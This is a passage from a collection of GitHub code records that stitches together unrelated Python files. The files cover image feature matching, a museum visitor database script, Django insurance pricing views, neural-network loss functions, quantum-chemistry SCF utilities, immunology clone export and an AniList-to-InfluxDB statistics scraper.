__init__(self, parts, images, topMatches=20, drawMatches=True, iteration=None):\n super().__init__(parts, images, topMatches, drawMatches, iteration)\n self.bf = cv.BFMatcher(cv.NORM_L2, crossCheck=True)\n self.sift = cv.xfeatures2d.SIFT_create()\n\n def calculateDescriptor(self, img):\n t = timer()\n keypoints, descriptors = self.sift.detectAndCompute(img, None)\n t = timer() - t\n\n return keypoints, descriptors, t\n\n\n","repo_name":"sMteX/DiplomaThesis","sub_path":"src/algorithms/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10503485819","text":"import psycopg2\n\nclass Point:\n def __init__(self, id, arrivetime, leavetime):\n self.id = id\n self.arrivetime = arrivetime\n self.leavetime = leavetime\n\n\ndef resetInterestingExhibits():\n print(\"RESETTING PREVIOUS RESULTS\")\n cur = conn.cursor()\n\n\n people = [57, 67, 68]\n for p in people:\n cur.execute(\"drop table if exists exhibits_person_\" + str(p))\n\n\n conn.commit()\n cur.close()\n\ndef interestingExhibits(n_person):\n print(\"FINDING INTERESTING EXHIBITS FOR PERSON \", n_person)\n cur = conn.cursor()\n\n cur.execute('create table if not exists exhibits_person_'+ str(n_person) + ''' as (\n SELECT p.id as pointId, e.id as exhibitId, p.geom as point, p.arrivtime, p.leavetime, e.geom as geom\n FROM exhibits_on_tables as e, (\n select p.geom, min(st_distance(p.geom, e.geom))as min ''' + \n 'from stay_points_'+ str(n_person) + ''' as p, exhibits_on_tables as e\n group by p.geom ''' + \n ') as i JOIN stay_points_'+ str(n_person) + ''' as p ON p.geom = i.geom\n where st_distance(p.geom, e.geom) = i.min \n and st_distance(p.geom, e.geom) < 1)''')\n\n conn.commit()\n cur.close()\n\n# Connect to your postgres DB\nprint(\"Connecting to database...\")\nconn = psycopg2.connect(\"dbname=GDMD user=postgres password=khliabub\")\nresetInterestingExhibits()\n\npeople = [57, 67, 68]\nfor p in people:\n interestingExhibits(p)\n","repo_name":"marcoincerti/stay-points-detection-museum","sub_path":"interestingExhibits.py","file_name":"interestingExhibits.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6721235532","text":"from django.shortcuts import render\nfrom pdb import set_trace as bp\nfrom django.http import HttpResponse\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom insurance.models import (\n NAIC_Sub_Industry_Code_11, \n NAIC_Sub_Industry_Code_54, \n EO_Pricing_Model_Deductible,\n EO_Pricing_Model_Limit,\n EO_Pricing_Model_Base_Rate, \n EO_Pricing_Model_Marginal, \n Errors_Omissions_Policy_Details, \n Hazard_Rate_Multiplier, \n NAIC_Industry_Code, \n NAIC_Sub_Industry_Hazard_Rating )\nfrom insurance.lib.helper import getBaseRate\n\n# Create your views here.\ndef index(request):\n # return HttpResponse('Hello from insurance')\n\n return render(request, 'insurance/index.html', {\n 'title': 'Latest policies'\n })\n\n# sub_industry = NAIC_Sub_Industry_Code_11.objects.first()['industry']\n@csrf_exempt\ndef create_policy(request):\n # To fetch the list of all the major Industries\n # Fetches the class code of the Industry based on the input\n # Fetches the Sub-Industry based on the Class Code\n # Gets the 4 digit sub-class-code based on the User Input\n # Query to get the Hazard class multiplier for the specific Sub-Industry\n # User Inputs\n # Select appropriate Deductible multiplier\n # User input\n # Select appropriate Increased Limit Factor\n # Asks the User for his Annual revenue to calculate the Base price\n\n all_industries = NAIC_Industry_Code.objects.all() \n class_code = NAIC_Industry_Code.objects.filter(class_code = request.POST['class_code'])[0].class_code\n sub_industry = NAIC_Sub_Industry_Code_54.objects.first().industry\n class_sub_code = NAIC_Sub_Industry_Code_54.objects.first().class_sub_code\n hazard_level_rating = NAIC_Sub_Industry_Hazard_Rating.objects.filter(class_sub_code = class_sub_code)[0].hazard_level_rating\n hazard_rate_multiplier = Hazard_Rate_Multiplier.objects.filter(hazard_level_rating = hazard_level_rating)[0].rate_multiplier\n deductible_amount = request.POST['deductible_amount'] \n deductible_multiplier = EO_Pricing_Model_Deductible.objects.filter(deductible_amount = deductible_amount)[0].multiplier \n coverage_limit = request.POST['coverage_limit'] \n inc_limit_factor = EO_Pricing_Model_Limit.objects.filter(occurence_limit = coverage_limit)[0].increased_limit_factor\n ann_revenue_norm = int(request.POST['ann_revenue'])/1000\n base_marginal_rate = getBaseRate(ann_revenue_norm)\n marginal_rate = 1\n base_rate = 0\n if len(base_marginal_rate) == 1 :\n base = EO_Pricing_Model_Base_Rate.objects.filter(annual_sales = base_marginal_rate[0])[0].base_rate\n base_rate = base\n else :\n base = EO_Pricing_Model_Base_Rate.objects.filter(annual_sales = base_marginal_rate[0])[0].base_rate\n marginal_rate = EO_Pricing_Model_Marginal.objects.filter(annual_sales = base_marginal_rate[1])[0].marginal_price\n base_rate = base + (ann_revenue_norm - base_marginal_rate[0]) * marginal_rate\n premium_price = float(base_rate * hazard_rate_multiplier * deductible_multiplier * inc_limit_factor * 1.4)\n return HttpResponse(premium_price)\n\ndef policy_details(request, policy_code, naic_code):\n print(request)\n print(policy_code)\n print(naic_code)\n return HttpResponse(\"OK\")\n\ndef policy_description(request):\n print(request)\n return HttpResponse(\"OK\")\n\n# 'policy_description\n# 'create_policy","repo_name":"andiwonder/freelance_stuff","sub_path":"insurance/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22309010938","text":"from setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import sys, pytest\n errcode = pytest.main(self.test_args)\n sys.exit(errcode)\n\nsetup(\n name='mmb_perceptron',\n version='0.0.1',\n description='Perceptron algorithms for machine learning',\n url='http://github.com/mbollmann/perceptron/',\n license='MIT License',\n author='Marcel Bollmann',\n author_email='bollmann@linguistics.rub.de',\n packages=find_packages(),\n install_requires=['numpy>=1.8.0', 'progressbar2==3.5.0'],\n tests_require=['pytest'],\n cmdclass={'test': PyTest},\n scripts=['bin/perceptron-tagger.py', 'bin/perceptron-print-weights.py']\n)\n","repo_name":"mbollmann/perceptron","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35904020634","text":"import torch.nn.functional as F\r\nfrom torch.nn.modules.loss import _WeightedLoss\r\nimport torch\r\nimport torch.nn as nn\r\nimport math\r\n\r\nLOSS_FACTORY = {'classification': lambda args, scaling: ClassificationLoss(args, scaling),\r\n 'binary_classification': lambda args, scaling: BinaryClassificationLoss(args, scaling),\r\n 'regression': lambda args, scaling: RegressionLoss(args, scaling)}\r\n\r\nclass Loss(nn.Module):\r\n def __init__(self, args, scaling):\r\n super(Loss, self).__init__()\r\n self.args = args\r\n self.scaling = scaling \r\n\r\n def kl_divergence(self, kl):\r\n if len(kl)>1:\r\n return kl.mean()\r\n else:\r\n return kl\r\n\r\nclass BinaryClassificationLoss(Loss):\r\n def __init__(self, args, scaling):\r\n super(BinaryClassificationLoss, self).__init__(args, scaling)\r\n self.bce = nn.BCELoss()\r\n\r\n def forward(self, outs, targets, model, kl, gamma, n_batches, n_points):\r\n if self.scaling=='whole':\r\n bce = n_points*self.bce(outs, targets)\r\n kl = self.kl_divergence(kl) / n_batches\r\n elif self.scaling =='batch':\r\n bce = self.bce(outs, targets)\r\n kl = self.kl_divergence(kl) / (outs.shape[0]*n_batches)\r\n else:\r\n raise NotImplementedError('Other scaling not implemented!')\r\n loss = bce + gamma*kl\r\n return loss, bce, kl\r\n\r\n\r\nclass ClassificationLoss(Loss):\r\n def __init__(self, args, scaling):\r\n super(ClassificationLoss, self).__init__(args, scaling)\r\n self.ce = _SmoothCrossEntropyLoss(smoothing=self.args.smoothing)\r\n def forward(self, outs, targets, model, kl, gamma, n_batches, n_points):\r\n if self.scaling=='whole':\r\n ce = n_points*self.ce(outs, targets)\r\n kl = self.kl_divergence(kl) / n_batches\r\n elif self.scaling=='batch':\r\n ce = self.ce(outs, targets)\r\n kl = self.kl_divergence(kl) / (outs.shape[0]*n_batches)\r\n else:\r\n raise NotImplementedError('Other scaling not implemented!')\r\n loss = ce + gamma * kl\r\n\r\n return loss, ce, kl\r\n\r\nclass RegressionLoss(Loss):\r\n def __init__(self, args, scaling):\r\n super(RegressionLoss, self).__init__(args, scaling)\r\n self.mse = nn.MSELoss()\r\n\r\n def forward(self, outs, targets, model, kl, gamma, n_batches, n_points):\r\n if self.scaling == 'whole':\r\n mse = n_points*self.mse(outs, targets)\r\n kl = self.kl_divergence(kl) / n_batches\r\n elif self.scaling == 'batch':\r\n mse = self.mse(outs, targets)\r\n kl = self.kl_divergence(kl) / (outs.shape[0]*n_batches)\r\n else:\r\n raise NotImplementedError('Other scaling not implemented!')\r\n loss = mse + gamma*kl\r\n return loss, mse, kl\r\n\r\nclass _SmoothCrossEntropyLoss(_WeightedLoss):\r\n def __init__(self, weight=None, reduction='mean', smoothing=0.0):\r\n super().__init__(weight=weight, reduction=reduction)\r\n self.smoothing = smoothing\r\n self.weight = weight\r\n self.reduction = reduction\r\n\r\n @staticmethod\r\n def _smooth_one_hot(targets, n_classes, smoothing=0.0):\r\n assert 0 <= smoothing < 1\r\n with torch.no_grad():\r\n targets = torch.empty(size=(targets.size(0), n_classes),\r\n device=targets.device) \\\r\n .fill_(smoothing / (n_classes-1)) \\\r\n .scatter_(1, targets.data.unsqueeze(1), 1.-smoothing)\r\n return targets\r\n\r\n def forward(self, inputs, targets, smoothing = None):\r\n if smoothing is None:\r\n smoothing = self.smoothing\r\n targets = _SmoothCrossEntropyLoss._smooth_one_hot(targets, inputs.size(-1),\r\n smoothing)\r\n lsm = torch.log(inputs)\r\n\r\n if self.weight is not None:\r\n lsm = lsm * self.weight.unsqueeze(0)\r\n\r\n loss = -(targets * lsm).sum(-1)\r\n\r\n if self.reduction == 'sum':\r\n loss = loss.sum()\r\n elif self.reduction == 'mean':\r\n loss = loss.mean()\r\n\r\n return loss","repo_name":"martinferianc/BayesianNeuralNets","sub_path":"src/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"34049432416","text":"#!/usr/bin/env python\n\nimport json\nimport queue\nimport threading\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom sys import exit\n\n\n# HTTPRequestHandler class\nclass RequestHandler(BaseHTTPRequestHandler):\n dataQueue = None\n lastData = None\n\n def address_string(self):\n host, port = self.client_address[:2]\n # return socket.getfqdn(host)\n return host\n\n def refresh_data(self):\n try:\n latestData = json.dumps(self.dataQueue.get(False))\n if len(latestData) > 10:\n self.lastData = latestData\n except queue.Empty:\n pass\n\n # GET\n def do_GET(self):\n global data\n # Send response status code\n self.send_response(200)\n\n # Send headers\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n self.refresh_data()\n\n # Send message back to client\n message = self.lastData\n\n # Write content as utf-8 data\n self.wfile.write(bytes(message, \"utf8\"))\n return\n\n def log_message(self, format, *args):\n return\n\n\nclass MyHTTPServer(HTTPServer):\n def serve_forever(self, dataQueue):\n self.RequestHandlerClass.dataQueue = dataQueue\n HTTPServer.serve_forever(self)\n\n\nclass APIServer(threading.Thread):\n\n def __init__(self, port):\n threading.Thread.__init__(self)\n self.port = port\n\n self.httpd = None\n\n self.dataQueue = queue.LifoQueue(50)\n\n def run(self):\n # Server settings\n # Choose port 8080, for port 80, which is normally used for a http server, you need root access\n server_address = ('127.0.0.1', self.port)\n self.httpd = MyHTTPServer(server_address, RequestHandler)\n self.httpd.serve_forever(self.dataQueue)\n\n def stop(self):\n if self.httpd:\n self.httpd.shutdown()\n exit(0)\n","repo_name":"david98/pynetmonitor","sub_path":"apiserver.py","file_name":"apiserver.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"501092163","text":"import serial\nimport time\nimport threading\nimport bpy\n\nprint(\"-----\")\n\n#Setup random cubez\nfrom random import randint\n\n#how many cubes you want to add\ncount = 8\n\nfor c in range(0,count):\n\tx = c*1.2\n\ty = 0\n\tz = 0\n\tbpy.ops.mesh.primitive_cube_add(location=(x,y,z))\n\n\n\nfor cube in range (0, len(bpy.data.objects)):\n\tprint(bpy.data.objects[cube])\n\nprint(\"-----\")\n\n\n\nser = serial.Serial(\"COM4\", 9600)\n\n\ndef readSerialData():\n\twhile True:\n\t\tline = str(ser.readline())\n\t\tline = line.replace(\"b'\", \"\")\n\t\tline = line.replace(\"\\\\r\\\\n'\", \"\")\n\t\tprint(type(line))\n\t\td = line.split(':')\n\t\tprint(d)\n\t\t\n\n\t\tfor i in range (0, len(d)-1):\n\t\t\tif(d[i] == \"1\"):\n\t\t\t\tbpy.data.objects[i].scale = (1, 10, 1)\n\t\t\telse:\n\t\t\t\tbpy.data.objects[i].scale = (1, 1, 1)\n\ndef doOtherStuff():\n\ttxt = input(\"INPUT: \")\n\tif(txt == \"0\"):\n\t\texit()\n\nthreading.Thread(target=readSerialData).start()\n#threading.Thread(target=doOtherStuff).start()\n","repo_name":"shandouming1/Blenduino","sub_path":"archive/blenderThreadingSerialTest.py","file_name":"blenderThreadingSerialTest.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"37511147815","text":"\"\"\"\nFractional occupation number (FON) utilities for SCF convergence\n\nImplementation of FON-HF technique.\nJCP 110 2, 1999\n\"\"\"\nimport numpy as np\n\n# set up constants\nBOLTZMANN = 1.38064852E-23 # J / K\nj_to_h = 2.293710449E17\nBOLTZMANN_H = BOLTZMANN * j_to_h\n\nclass FON:\n\n def __init__(self):\n pass\n\n def broadening_param_to_temp(self, beta):\n return 1 / (BOLTZMANN_H * beta)\n\n def get_start_temp(self, dmat, fock, overlap):\n error = fock @ dmat @ overlap - overlap @ dmat @ fock\n return 10_000 * np.linalg.norm(error)\n\n def pfon_rhf(self, temp: float, orb_energies: np.ndarray, num_alpha):\n \"\"\"pseudo-fractional-occupation. Fermi energy is defined as\n e_HOMO + e_LUMO / 2. Occupations do not necessarily sum to\n the target number of electrons so we need to normalize the occs.\n\n Effectively this means that for a given temperature a higher\n number of virtuals are fractionally occupied.\n \"\"\"\n e_homo = orb_energies[num_alpha - 1]\n e_lumo = orb_energies[num_alpha]\n e_fermi = (e_lumo + e_homo) / 2\n n_i = np.array(self.fermi_dirac(orb_energies, e_fermi, temp))\n return n_i * num_alpha / np.sum(n_i)\n\n def frac_occ_rhf(self, temp: float, orb_energies: np.ndarray, num_alpha):\n \"\"\"\n Determine fractional occupations for a given temperature\n\n The Fermi energy is determined by bisection such thtat\n\n \\sum_{i}n_{i} = N\n\n where n_{i} is\n\n n_{i} = 1 / (1 + e^{beta(e_{i} - e_{f})})\n\n and N is the number of electrons\n\n For the binary search if e_f = e_{0} then occupation is 0.5\n if e_f = e_{-1} then occupation is (norb-1) + 0.5\n \"\"\"\n e_fermi = self.bisection_fermi_energy_search(orb_energies[0],\n orb_energies[-1],\n num_alpha,\n orb_energies,\n temp\n )\n return self.fermi_dirac(orb_energies, e_fermi, temp)\n\n def bisection_fermi_energy_search(self, e_f_init_low: float,\n e_f_init_high: float, target_n: int,\n orb_e: np.ndarray, temp: float) -> float:\n \"\"\"\n Bisection search for the fermi energy\n \"\"\"\n current_score = 0\n low_val = e_f_init_low\n high_val = e_f_init_high\n while not np.isclose(current_score, target_n):\n middle_val = (low_val + high_val) / 2\n middle_score = sum(self.fermi_dirac(orb_e, middle_val, temp))\n if middle_score < target_n:\n low_val = middle_val\n else:\n high_val = middle_val\n current_score = middle_score\n return middle_val\n\n def fermi_dirac(self, e_i: np.ndarray, e_f: float, temp: float):\n \"\"\"save fermi-dirac avoids numerical overflow\"\"\"\n beta = 1 / (BOLTZMANN_H * temp)\n exp_val = beta * (e_i - e_f)\n # print(\"x \", exp_val)\n # print(\"1 + e^x\", 1 + np.exp(exp_val))\n # print(\"1 + e^-x\", 1 + np.exp(-exp_val))\n safe_fd = []\n for xx in exp_val:\n if xx > 10:\n sfd = np.exp(-xx) / (1 + np.exp(-xx))\n elif xx < -10:\n sfd = 1 / (1 + np.exp(xx))\n else:\n sfd = 1 / (1 + np.exp(xx))\n safe_fd.append(sfd)\n return safe_fd\n\n\nif __name__ == \"__main__\":\n np.set_printoptions(linewidth=300)\n from pyscf import gto, scf\n import openfermion as of\n from rhf import RHF\n\n # mol = gto.M(\n # verbose=0,\n # atom='O 0.000000000000 -0.143225816552 0.000000000000;H 1.638036840407 1.136548822547 -0.000000000000; H -1.638036840407 1.136548822547 -0.000000000000',\n # basis='sto-3g',\n # )\n mol = gto.M(\n verbose=0,\n atom='Li 0 0 0; H 0 0 5.0',\n basis='sto-3g',\n )\n s = mol.intor('int1e_ovlp')\n t = mol.intor('int1e_kin')\n v = mol.intor('int1e_nuc')\n eri = mol.intor('int2e', aosym='s1') # (ij|kl)\n rhf = RHF(t + v, s, eri, mol.nelectron, iter_max=3,\n diis_length=4)\n rhf.solve_diis()\n fon = FON()\n mo_e = rhf.mo_energies\n # print(mo_e)\n # print(sum(fon.fermi_dirac(rhf.mo_energies, rhf.mo_energies[0], 10)))\n # print(sum(fon.fermi_dirac(rhf.mo_energies, rhf.mo_energies[-1], 10)))\n # print()\n # e_f = fon.bisection_fermi_energy_search(mo_e[0], mo_e[-1], rhf.nelec // 2,\n # mo_e, 10)\n # print(fon.fermi_dirac(rhf.mo_energies, e_f, 10))\n # n_i = fon.frac_occ_rhf(500000, mo_e, 2)\n n_i = fon.pfon_rhf(50000, mo_e, 2)\n print(n_i)\n print(sum(n_i))","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/scf/fon.py","file_name":"fon.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"73787069633","text":"import time\n\nfrom Hatlab_RFSOC.proxy import getSocProxy\nfrom qick import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm import tqdm\nsoc, soccfg = getSocProxy(\"myqick216-01\")\nfrom T004C_phaseReset_test import LoopbackProgram\n\n\n\n\n\nconfig = {\"res_ch\": 0, # --Fixed\n \"ro_chs\": [0], # --Fixed\n \"reps\": 20000, # --Fixed\n \"relax_delay\": 1.0, # --us\n \"res_phase\": 0, # --degrees\n \"pulse_style\": \"const\", # --Fixed\n\n \"length\": 1000, # [Clock ticks]\n # Try varying length from 10-100 clock ticks\n\n \"readout_length\": 1000, # [Clock ticks]\n # Try varying readout_length from 50-1000 clock ticks\n\n \"pulse_gain\": 30000, # [DAC units]\n # Try varying pulse_gain from 500 to 30000 DAC units\n\n # \"pulse_freq\": 2457.60 * 3 +10 , # [MHz]\n # \"readout_freq\": 10, # [MHz]\n\n \"pulse_freq\": 4933.3, # [MHz]\n \"readout_freq\": 18.1, # [MHz]\n\n \"adc_trig_offset\": 120, # [Clock ticks]\n # Try varying adc_trig_offset from 100 to 220 clock ticks\n\n \"soft_avgs\": 1\n # Try varying soft_avgs from 1 to 200 averages\n\n }\n\n###################\n# Try it yourself !\n###################\n\npulse_len_list = np.arange(100, 200, 1)\nbufi_list = np.zeros((len(pulse_len_list), config[\"reps\"]))\nbufq_list = np.zeros((len(pulse_len_list), config[\"reps\"]))\ni = 0\nwhile i < len(pulse_len_list):\n try:\n config[\"length\"] = pulse_len_list[i]\n config[\"readout_length\"] = pulse_len_list[i]\n prog = LoopbackProgram(soccfg, config)\n avg_i, avg_q = prog.acquire(soc, load_pulses=True, progress=False, debug=False)\n bufi_list[i] = prog.di_buf[0]\n bufq_list[i] = prog.dq_buf[0]\n i+=1\n print(i)\n except RuntimeError:\n print(i, \"!!!!!!!!\")\n\n\n\navgi = np.average(bufi_list, axis=1)\navgq = np.average(bufq_list, axis=1)\nstdr_i = np.std(bufi_list, axis=1)\nstdr_q = np.std(bufq_list, axis=1)\n\n\n\nplt.figure()\nplt.title(\"avg\")\nplt.plot(pulse_len_list, avgi)\nplt.plot(pulse_len_list, avgq)\n\nplt.figure()\nplt.title(\"std err\")\nplt.plot(pulse_len_list, stdr_i)\nplt.plot(pulse_len_list, stdr_q)\nplt.xlabel(\"pulse (integration) length, clock cycles\")\n\nplt.figure()\nplt.title(\"avg/stderr\")\nplt.plot(pulse_len_list, abs(avgi/stdr_i))\nplt.plot(pulse_len_list, abs(avgq/stdr_q))\nplt.xlabel(\"pulse (integration) length, clock cycles\")\n\n\n","repo_name":"PITT-HATLAB/Hatlab_RFSOC","sub_path":"Hatlab_RFSOC/legacy/demo_scripts/T004D_phaseReset_test_integ.py","file_name":"T004D_phaseReset_test_integ.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"40060648982","text":"from collections import Counter\n\nimport numpy as np\nfrom sqlalchemy.orm import joinedload\n\nfrom immunedb.common.models import CloneStats, Sample\nfrom immunedb.exporting.tsv_writer import StreamingTSV\nfrom immunedb.exporting.writer import ExportWriter\nfrom immunedb.util.funcs import chunks\nfrom immunedb.util.lookups import aas_from_nts\nfrom immunedb.util.log import logger\n\nDEFAULT_CLONE_FIELDS = [\n 'clone_id', 'subject', 'v_gene', 'j_gene', 'functional', 'insertions',\n 'deletions', 'cdr3_nt', 'cdr3_num_nts', 'cdr3_aa',\n 'uniques', 'instances', 'copies', 'germline', 'parent_id',\n 'avg_v_identity', 'top_copy_seq'\n]\n\n\ndef get_clone_row(clone):\n row = {}\n for field in DEFAULT_CLONE_FIELDS:\n try:\n row[field] = getattr(clone, field)\n except AttributeError:\n pass\n row.update({\n 'clone_id': clone.id,\n 'subject': clone.subject.identifier,\n 'functional': 'T' if clone.functional else 'F',\n 'insertions': clone._insertions,\n 'deletions': clone._deletions,\n 'uniques': clone.overall_unique_cnt,\n 'instances': clone.overall_instance_cnt,\n 'copies': clone.overall_total_cnt,\n })\n return row\n\n\ndef get_immunedb_output(session, clones):\n writer = StreamingTSV(DEFAULT_CLONE_FIELDS)\n yield writer.writeheader()\n\n for clone, agg in clones.items():\n counts = agg['counts']\n row = get_clone_row(clone)\n row['copies'] = counts['copies']\n row['instances'] = counts['instances']\n row['top_copy_seq'] = agg['top_seq']\n row['avg_v_identity'] = round(agg['avg_v_identity'], 4)\n yield writer.writerow(row)\n\n\ndef get_vdjtools_output(session, clones):\n writer = StreamingTSV(['count', 'freq', 'cdr3nt', 'cdr3aa', 'v', 'd', 'j'])\n counts = Counter()\n total_copies = 0\n for clone, agg in clones.items():\n key = (clone.v_gene, clone.j_gene, clone.cdr3_nt)\n counts[key] += agg['counts']['copies']\n total_copies += counts[key]\n\n yield writer.writeheader()\n for key in sorted(counts, key=counts.get, reverse=True):\n count = counts[key]\n v, j, cdr3_nt = key\n yield writer.writerow({\n 'count': count,\n 'freq': count / total_copies,\n 'cdr3nt': cdr3_nt,\n 'cdr3aa': aas_from_nts(cdr3_nt),\n 'v': v,\n 'd': '.',\n 'j': j,\n })\n\n\ndef _get_feature(stat, feature):\n if feature == 'subject':\n return stat.clone.subject.identifier\n elif feature == 'sample':\n return stat.sample.name\n else:\n return stat.sample.metadata_dict.get(feature, 'NA')\n\n\ndef get_pooled_samples(session, sample_ids, features):\n stats = session.query(\n CloneStats\n ).options(\n joinedload(CloneStats.sample),\n joinedload(CloneStats.clone).defer('tree'),\n )\n aggregated = {}\n for chunk_sample_ids in chunks(sample_ids, 20):\n for stat in stats.filter(CloneStats.sample_id.in_(chunk_sample_ids)):\n sample_feature = tuple(\n _get_feature(stat, f) for f in sorted(features)\n )\n key = (stat.sample.subject.identifier, sample_feature)\n agg = aggregated.setdefault(key, {}).setdefault(\n stat.clone,\n {'top_seq': None, 'top_copies': 0, 'counts': Counter(),\n 'avg_v_identity': []}\n )\n if stat.top_copy_seq_copies > agg['top_copies']:\n agg['top_copies'] = stat.top_copy_seq_copies\n agg['top_seq'] = stat.top_copy_seq_sequence\n agg['counts']['copies'] += stat.total_cnt\n agg['counts']['instances'] += stat.unique_cnt\n agg['avg_v_identity'].append(stat.avg_v_identity * stat.total_cnt)\n\n for clones in aggregated.values():\n for agg in clones.values():\n agg['avg_v_identity'] = np.sum(\n agg['avg_v_identity']) / agg['counts']['copies']\n\n return aggregated\n\n\ndef get_filename(subject, feature_keys, feature_values):\n if feature_keys == ('subject',):\n return '{}.pooled.tsv'.format(subject)\n feature_value = '_AND_'.join(feature_values)\n return '{}.{}.pooled.tsv'.format(subject, feature_value)\n\n\ndef write_pooled_clones(session, out_format, sample_ids=None,\n pool_on=('sample',), zipped=False, **kwargs):\n # Samples and subjects can't be combined with other features\n exclusives = set(pool_on).intersection(set(('sample', 'subject')))\n if len(pool_on) > 1 and exclusives:\n pool_on = (list(exclusives)[0],)\n logger.warning('You specified pooling on {feat} which '\n 'cannot be combined with other features.'\n ' Using only {feat}.'.format(feat=pool_on[0]))\n\n logger.info('Writing clones pooled by {} in {} format'.format(\n ','.join(pool_on), out_format))\n\n sample_ids = sample_ids or [s.id for s in session.query(Sample)]\n aggregated = get_pooled_samples(session, sample_ids, pool_on)\n\n output_func = {\n 'immunedb': get_immunedb_output,\n 'vdjtools': get_vdjtools_output\n }[out_format]\n with ExportWriter(zipped=zipped) as fh:\n for (subject, feature_value), clones in aggregated.items():\n logger.info('Pooling subject {} for feature(s) {}'.format(\n subject,\n ','.join(feature_value)))\n fh.set_filename(get_filename(subject, pool_on, feature_value))\n fh.write(output_func(session, clones))\n return fh.get_zip_value()\n","repo_name":"arosenfeld/immunedb","sub_path":"immunedb/exporting/clones/listing.py","file_name":"listing.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"3890621223","text":"import os\nfrom datetime import datetime\n\nimport requests\nimport pandas as pd\n\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nfrom subprocess import Popen, PIPE\n\n\n# get InfluxDB Token\nwith open('config') as f:\n\twords = f.read().split(\" \")\n\ttoken = words[0]\n\torg = words[1]\n\tbucket = words[2]\n\tprojectPath = words[3]\n\tcsvFilePath = projectPath + 'historyStats.csv'\n\nanilistApiUrl = 'https://graphql.anilist.co'\n\ndef getEpSeen(name):\n query = '''\n query($name:String) {\n\t\tUser(name: $name) {\n\t\t\tstatistics {\n\t\t\t\tanime {\n\t\t\t\t\tepisodesWatched\n\t\t\t\t}\n\t\t\t}\n\t\t}\n }\n '''\n # Define our query variables and values that will be used in the query request\n variables = {\n 'name': name\n }\n # Make the HTTP Api request\n response = requests.post(anilistApiUrl, json={'query': query, 'variables': variables}).json()\n return response[\"data\"][\"User\"][\"statistics\"][\"anime\"][\"episodesWatched\"]\n\n\ndef getFollowingRequest(id, page):\n\t# Here we define our query as a multi-line string\n query = '''\n query ($page: Int, $perPage: Int) {\n Page(page: $page, perPage: $perPage) {\n\t\t\tpageInfo {\n\t\t\t\ttotal\n\t\t\t}\n\t\t\tfollowing(userId:''' + str(id) + ''') {\n\t\t\t\tname\n\t\t\t}\n\t\t}\n }\n '''\n\n # Define our query variables and values that will be used in the query request\n variables = {\n 'page': page\n }\n # Make the HTTP Api request\n response = requests.post(anilistApiUrl, json={'query': query, 'variables': variables}).json()\n return response\n\ndef convertToList(jsonArr):\n result = []\n for i in jsonArr:\n result.append(i[\"name\"])\n\n return result\n\ndef getFollowing(id):\n response = getFollowingRequest(id, 1) # First request\n total = response['data']['Page']['pageInfo']['total']\n followers = response['data']['Page']['following']\n\n for i in range(2, int(total/50)+2): # If the first page was not enough to contain all the users, request the next pages\n response = getFollowingRequest(id, i)\n followers = followers + response['data']['Page']['following'] # appending users\n\n return convertToList(followers)\n\n\ntoday = datetime.today().strftime('%Y%m%d')\nusers = getFollowing(179627) #user id of Piede\nprint(users)\n\n # creating dataframe\n #\tif not already present, creating an empty one\nif os.path.isfile(csvFilePath):\n\tdf = pd.read_csv(csvFilePath)\nelse:\n\tdata = {'name':users}\n\tdf = pd.DataFrame(data)\n\n# creating new column for today's date\nif(df.columns[-1] != today):\n\tdf[today] = -1\n\nfor user in users:\n\tepCount = getEpSeen(user)\n\tprint(user + \": \" + str(epCount))\n\t# if user is not present in the df yet\n\tif (len(df[df['name'] == user]) == 0):\n\t\t# we're adding him\n\t\tdf.loc[len(df)] = [user]+[-1]*(len(df.columns)-1)\n\t\n\t# adding today's value in the respective cell\n\tdf.loc[df['name'] == user,today] = epCount\n\n\ndf.to_csv(csvFilePath, index=False)\n\n\nwith InfluxDBClient(url=\"http://localhost:8086\", token=token, org=org) as client:\n\twrite_api = client.write_api(write_options=SYNCHRONOUS)\n\tdateObj = datetime.strptime(today, \"%Y%m%d\")\n\n\tfor index, row in df.iterrows():\n\t\tname = row['name']\n\t\tcount = df[today][index]\n\t\t\n\t\t# Ignoring -1 values (missing records)\n\t\tif(count != -1):\n\t\t\tprint(str(dateObj) + \" - \" + name + \": \" + str(count))\n\t\t\tpoint = Point(name) \\\n\t\t\t\t.field(\"viewed_episodes\", count) \\\n\t\t\t\t.time(dateObj, WritePrecision.NS)\n\t\t\t\n\t\t\twrite_api.write(bucket, org, point)\n\n\n\nscript = 'display notification \"Finished running ANILIST script\" with title \"Added all data to 